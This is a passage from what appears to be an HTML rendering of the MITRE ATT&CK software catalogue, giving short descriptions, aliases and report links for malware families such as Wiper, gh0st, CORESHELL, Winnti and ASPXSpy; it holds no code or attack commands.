<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wiper"><a class="anchor" href="#_wiper"></a><a class="link" href="#_wiper">Wiper</a></h3>
<div class="paragraph">
<p>Wiper is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies.[[Citation: Dell Wiper]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1295. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0041">https://attack.mitre.org/wiki/Software/S0041</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/">http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unknown_logger"><a class="anchor" href="#_unknown_logger"></a><a class="link" href="#_unknown_logger">Unknown Logger</a></h3>
<div class="paragraph">
<p>Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign.[[Citation: Forcepoint Monsoon]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1296. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0130">https://attack.mitre.org/wiki/Software/S0130</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gh0st"><a class="anchor" href="#_gh0st"></a><a class="link" href="#_gh0st">gh0st</a></h3>
<div class="paragraph">
<p>gh0st is a remote access tool (RAT). The source code is public and it has been used by many groups.[[Citation: FireEye Hacking Team]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1297. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0032">https://attack.mitre.org/wiki/Software/S0032</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/07/demonstrating%20hustle.html">https://www.fireeye.com/blog/threat-research/2015/07/demonstrating%20hustle.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coreshell"><a class="anchor" href="#_coreshell"></a><a class="link" href="#_coreshell">CORESHELL</a></h3>
<div class="paragraph">
<p>CORESHELL is a downloader used by APT28. The older versions of this malware are known as SOURFACE and newer versions as CORESHELL. It has also been referred to as Sofacy, though that term has been used widely to refer to both the group APT28 and malware families associated with the group.[[Citation: FireEye APT28]][[Citation: FireEye APT28 January 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: CORESHELL, SOURFACE</p>
</div>
<div class="paragraph">
<p>CORESHELL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CORESHELL</p>
</li>
<li>
<p>SOURFACE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1298. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0137">https://attack.mitre.org/wiki/Software/S0137</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remsec"><a class="anchor" href="#_remsec"></a><a class="link" href="#_remsec">Remsec</a></h3>
<div class="paragraph">
<p>Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua.[[Citation: Symantec Strider Blog]]</p>
</div>
<div class="paragraph">
<p>Aliases: Remsec, Backdoor.Remsec, ProjectSauron</p>
</div>
<div class="paragraph">
<p>Remsec is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Remsec</p>
</li>
<li>
<p>Backdoor.Remsec</p>
</li>
<li>
<p>ProjectSauron</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1299. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0125">https://attack.mitre.org/wiki/Software/S0125</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets">http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flashflood"><a class="anchor" href="#_flashflood"></a><a class="link" href="#_flashflood">FLASHFLOOD</a></h3>
<div class="paragraph">
<p>FLASHFLOOD is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.[[Citation: FireEye APT30]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1300. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0036">https://attack.mitre.org/wiki/Software/S0036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinytyphon"><a class="anchor" href="#_tinytyphon"></a><a class="link" href="#_tinytyphon">TINYTYPHON</a></h3>
<div class="paragraph">
<p>TINYTYPHON is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm.[[Citation: Forcepoint Monsoon]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1301. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0131">https://attack.mitre.org/wiki/Software/S0131</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seaduke"><a class="anchor" href="#_seaduke"></a><a class="link" href="#_seaduke">SeaDuke</a></h3>
<div class="paragraph">
<p>SeaDuke is malware that was used by APT29 from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with CozyCar.[[Citation: F-Secure The Dukes]]</p>
</div>
<div class="paragraph">
<p>Aliases: SeaDuke, SeaDaddy, SeaDesk</p>
</div>
<div class="paragraph">
<p>SeaDuke is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SeaDuke</p>
</li>
<li>
<p>SeaDaddy</p>
</li>
<li>
<p>SeaDesk</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1302. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0053">https://attack.mitre.org/wiki/Software/S0053</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_janicab"><a class="anchor" href="#_janicab"></a><a class="link" href="#_janicab">Janicab</a></h3>
<div class="paragraph">
<p>is an OS X trojan that relied on a valid developer ID and oblivious users to install it.[[Citation: Janicab]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1303. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0163">https://attack.mitre.org/wiki/Software/S0163</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thesafemac.com/new-signed-malware-called-janicab/">http://www.thesafemac.com/new-signed-malware-called-janicab/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_advstoreshell"><a class="anchor" href="#_advstoreshell"></a><a class="link" href="#_advstoreshell">ADVSTORESHELL</a></h3>
<div class="paragraph">
<p>ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase.[[Citation: Kaspersky Sofacy]][[Citation: ESET Sednit Part 2]]</p>
</div>
<div class="paragraph">
<p>Aliases: ADVSTORESHELL, NETUI, EVILTOSS, AZZY, Sedreco</p>
</div>
<div class="paragraph">
<p>ADVSTORESHELL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ADVSTORESHELL</p>
</li>
<li>
<p>NETUI</p>
</li>
<li>
<p>EVILTOSS</p>
</li>
<li>
<p>AZZY</p>
</li>
<li>
<p>Sedreco</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1304. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0045">https://attack.mitre.org/wiki/Software/S0045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/">https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_s_type"><a class="anchor" href="#_s_type"></a><a class="link" href="#_s_type">S-Type</a></h3>
<div class="paragraph">
<p>S-Type is a backdoor that was used by Dust Storm from 2013 to 2014.[[Citation: Cylance Dust Storm]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1305. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0085">https://attack.mitre.org/wiki/Software/S0085</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512">https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nettraveler"><a class="anchor" href="#_nettraveler"></a><a class="link" href="#_nettraveler">NetTraveler</a></h3>
<div class="paragraph">
<p>NetTraveler is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013.[[Citation: Kaspersky NetTraveler]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1306. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0033">https://attack.mitre.org/wiki/Software/S0033</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf">http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dyre_2"><a class="anchor" href="#_dyre_2"></a><a class="link" href="#_dyre_2">Dyre</a></h3>
<div class="paragraph">
<p>Dyre is a Trojan that usually targets banking information.[[Citation: Raff 2015]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1307. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0024">https://attack.mitre.org/wiki/Software/S0024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.seculert.com/blogs/new-dyre-version-yet-another-malware-evading-sandboxes">http://www.seculert.com/blogs/new-dyre-version-yet-another-malware-evading-sandboxes</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_p2p_zeus"><a class="anchor" href="#_p2p_zeus"></a><a class="link" href="#_p2p_zeus">P2P ZeuS</a></h3>
<div class="paragraph">
<p>P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture.[[Citation: Dell P2P ZeuS]]</p>
</div>
<div class="paragraph">
<p>Aliases: P2P ZeuS, Peer-to-Peer ZeuS, Gameover ZeuS</p>
</div>
<div class="paragraph">
<p>P2P ZeuS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>P2P ZeuS</p>
</li>
<li>
<p>Peer-to-Peer ZeuS</p>
</li>
<li>
<p>Gameover ZeuS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1308. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0016">https://attack.mitre.org/wiki/Software/S0016</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/The%20Lifecycle%20of%20Peer%20to%20Peer%20Gameover%20ZeuS/">http://www.secureworks.com/cyber-threat-intelligence/threats/The%20Lifecycle%20of%20Peer%20to%20Peer%20Gameover%20ZeuS/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_comrat"><a class="anchor" href="#_comrat"></a><a class="link" href="#_comrat">ComRAT</a></h3>
<div class="paragraph">
<p>ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla.[[Citation: Symantec Waterbug]][[Citation: NorthSec 2015 GData Uroburos Tools]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1309. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0126">https://attack.mitre.org/wiki/Software/S0126</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/waterbug-attack-group.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/waterbug-attack-group.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf">https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winnti"><a class="anchor" href="#_winnti"></a><a class="link" href="#_winnti">Winnti</a></h3>
<div class="paragraph">
<p>Winnti is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, Winnti Group; however, reporting indicates a second distinct group, Axiom, also uses the malware.[[Citation: Kaspersky Winnti April 2013]][[Citation: Microsoft Winnti Jan 2017]][[Citation: Novetta Winnti April 2015]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1310. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0141">https://attack.mitre.org/wiki/Software/S0141</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf">http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/">https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redleaves"><a class="anchor" href="#_redleaves"></a><a class="link" href="#_redleaves">RedLeaves</a></h3>
<div class="paragraph">
<p>RedLeaves is a malware family used by menuPass. The code overlaps with PlugX and may be based upon the open source tool Trochilus.[[Citation: PWC Cloud Hopper Technical Annex April 2017]][[Citation: FireEye APT10 April 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: RedLeaves, BUGJUICE</p>
</div>
<div class="paragraph">
<p>RedLeaves is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RedLeaves</p>
</li>
<li>
<p>BUGJUICE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1311. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0153">https://attack.mitre.org/wiki/Software/S0153</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rtm_2"><a class="anchor" href="#_rtm_2"></a><a class="link" href="#_rtm_2">RTM</a></h3>
<div class="paragraph">
<p>RTM is custom malware written in Delphi. It is used by the group of the same name (RTM).[[Citation: ESET RTM Feb 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1312. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0148">https://attack.mitre.org/wiki/Software/S0148</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_callme"><a class="anchor" href="#_callme"></a><a class="link" href="#_callme">CallMe</a></h3>
<div class="paragraph">
<p>CallMe is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell.[[Citation: Scarlet Mimic Jan 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1313. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0077">https://attack.mitre.org/wiki/Software/S0077</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidedrv"><a class="anchor" href="#_hidedrv"></a><a class="link" href="#_hidedrv">HIDEDRV</a></h3>
<div class="paragraph">
<p>HIDEDRV is a rootkit used by APT28. It has been deployed along with Downdelph to execute and hide that malware.[[Citation: ESET Sednit Part 3]][[Citation: Sekoia HideDRV Oct 2016]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1314. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0135">https://attack.mitre.org/wiki/Software/S0135</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf">http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf">http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mis_type"><a class="anchor" href="#_mis_type"></a><a class="link" href="#_mis_type">Mis-Type</a></h3>
<div class="paragraph">
<p>Mis-Type is a backdoor hybrid that was used by Dust Storm in 2012.[[Citation: Cylance Dust Storm]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1315. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0084">https://attack.mitre.org/wiki/Software/S0084</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512">https://www.cylance.com/hubfs/2015%20cylance%20website/assets/operation-dust-storm/Op%20Dust%20Storm%20Report.pdf?t=1456259131512</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hikit"><a class="anchor" href="#_hikit"></a><a class="link" href="#_hikit">Hikit</a></h3>
<div class="paragraph">
<p>Hikit is malware that has been used by Axiom for late-stage <a id="persistence"></a> and <a id="exfiltration"></a> after the initial compromise.[[Citation: Axiom]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1316. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0009">https://attack.mitre.org/wiki/Software/S0009</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_evilgrab"><a class="anchor" href="#_evilgrab"></a><a class="link" href="#_evilgrab">EvilGrab</a></h3>
<div class="paragraph">
<p>EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns.[[Citation: PWC Cloud Hopper Technical Annex April 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1317. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0152">https://attack.mitre.org/wiki/Software/S0152</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aspxspy"><a class="anchor" href="#_aspxspy"></a><a class="link" href="#_aspxspy">ASPXSpy</a></h3>
<div class="paragraph">
<p>ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version.[[Citation: Dell TG-3390]]</p>
</div>
<div class="paragraph">
<p>Aliases: ASPXSpy, ASPXTool</p>
</div>
<div class="paragraph">
<p>ASPXSpy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ASPXSpy</p>
</li>
<li>
<p>ASPXTool</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1318. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0073">https://attack.mitre.org/wiki/Software/S0073</a></p></td>
</tr>
<tr>
